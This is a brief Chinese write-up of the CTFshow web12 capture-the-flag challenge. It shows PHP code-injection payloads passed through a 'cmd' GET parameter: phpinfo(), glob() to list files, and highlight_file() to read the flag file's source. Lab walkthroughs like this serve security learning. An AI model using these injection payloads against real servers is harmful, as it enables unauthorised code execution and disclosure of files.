本文描述了一次网络安全挑战中的过程,参与者通过利用BurpSuite抓包工具,实现了远程代码执行,进而通过`glob()`函数遍历文件并使用`highlight_file()`高亮显示关键文件内容,最终找到并提取了flag。
CTFshow-web-web12
打开靶场,显示如下
查看源代码,发现有个提示
利用burpsuite进行抓包,发现是get传参
尝试远程代码执行,传入参数
?cmd=phpinfo();
发现有回显
可以执行php函数
php中有个函数glob();
glob()函数返回匹配指定模式的文件名或目录
glob(“”)匹配任意文件
glob(“.txt”)匹配以txt后缀的文件
我们将当前目录下的文件打印出,输入
?cmd=print_r(glob("*"));
找到两个文件
我们使用高亮函数,将长的文件显示一下
highlight_file()函数可以用于将一个PHP文件的代码高亮显示,并输出到页面上或者保存到文件中。
输入
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
得出flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
